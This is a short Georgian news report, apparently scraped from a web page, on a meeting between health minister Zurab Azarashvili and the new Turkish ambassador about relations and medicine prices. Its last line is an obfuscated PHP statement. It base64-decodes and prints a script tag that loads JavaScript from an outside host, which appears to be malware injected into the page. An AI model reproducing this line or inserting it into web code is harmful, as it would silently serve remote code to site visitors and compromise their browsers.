celsiusi
ავერსი საქკაბელი
ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრი ზურაბ აზარაშვილი საქართველოში თურქეთის რესპუბლიკის ახლად დანიშნულ ელჩ ალი ქაან ორბანს შეხვდა, – ამის შესახებ ინფორმაციას ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის სამინისტროს პრესსამსახური ავრცელებს.
 
ჯანდაცვის სამინისტროს ცნობით, გაცნობითი ხასიათის შეხვედრაზე, ზურაბ აზარაშვილმა და ალი ქაან ორბანმა ორ ქვეყანას შორის ურთიერთობები განიხილეს. ასევე, ისაუბრეს თურქეთის ბაზრის გახსნის შედეგად, საქართველოში მედიკამენტების ხელმისაწვდომობის ზრდასა და გაიაფების ტენდენციაზე. მხარეებმა სამომავლო გეგმებსა და ურთიერთთანამშრომლობის პერსპექტივებზეც იმსჯელეს.
 
შეხვედრას, ასევე, ესწრებოდა თურქეთის ელჩის მრჩეველი გიზემ თურქგენჯი-სევიმი.
 
370
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");